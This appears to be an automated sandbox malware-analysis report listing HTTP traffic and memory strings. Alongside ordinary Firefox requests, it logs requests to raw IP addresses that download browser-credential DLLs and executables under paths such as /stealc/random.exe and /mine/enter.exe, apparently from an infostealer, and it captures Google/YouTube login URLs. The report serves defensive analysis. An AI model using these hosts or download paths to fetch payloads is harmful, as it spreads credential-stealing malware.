Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/8bc91d67-1d3d-4cd1-89f0-094c92ed8df4 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/894f51cb-fd5b-43cb-a050-43bd1fdc5ee6 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/b2e034e0-00ba-4630-9778-300fed6bde65 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/devtools-compatibility-browsers/changeset?_expected=1721884805468&_since=%221694439985514%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/7925cb6e-d44b-4094-a90f-28c0a426e872 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/b349a8f0-8f97-4587-92f0-a94aad66a9a4.png HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/a9a59e5d-077d-4df7-9757-dc9b0bf1ba19.png HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fimg.pastemagazine.com%2Fwp-content%2Fjuploads%2F2024%2F07%2Folympicbeds.jpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/1e666eb4-786d-4385-87e0-ba83ce528905.png HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/3eb97e9a-d15e-4467-bbd9-814e0a8aff0b.svg HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/c531d3ca-db81-4c48-83c3-8e9b586df0e2.jpg HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/translations-models/changeset?_expected=1721853459238&_since=%221692284142841%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/08c97d2d-b184-4f7c-8d26-38ec2e567a70.json HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbgmoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76O59q3kZuVkEikshcjAqxUN8FNn3aweiPynOeRPtNl-mQkf3AYfHIp2ju47tXoxYdAUO-imoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enmoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: places.sqlite.33.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0YouTubemoc.elgoog.stnuocca. equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I77EVwBCWklE9qIBneDMIiwFWCCFTErG2FyxHopmLBm9ld0zmag6hfnN6yKuG81xlYfRS6YoZQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1379105066%3A1722017451321129&ddm=0moc.elgoog.stnuocca.( equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I75aNkmYhtF_MmgmHjGWmp0oL3UvNytgZNbpUtsHuVRyXxpuwTtrRtVZa0mplhYWnP6By8Z9Ww&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1357171065%3A1722017418669557&ddm=0 equals www.youtube.com (Youtube)
Source: places.sqlite.33.dr String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3216406927.0000016DE49BF000.00000004.00000800.00020000.00000000.sdmp, places.sqlite.33.dr String found in binary or memory: https://www.youtube.com/accountmoc.ebutuoy.www. equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +www.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +www.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +www.youtube.comwww.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +3www.youtube.comaccounts.google.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: +Mwww.youtube.com\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3217482927.0000016DE07AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443 <ROUTE-via www.youtube.com:443> {NPN-TOKEN h3}^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3204782382.0000016DE9E4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3215505857.0000016DE4B6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsq equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
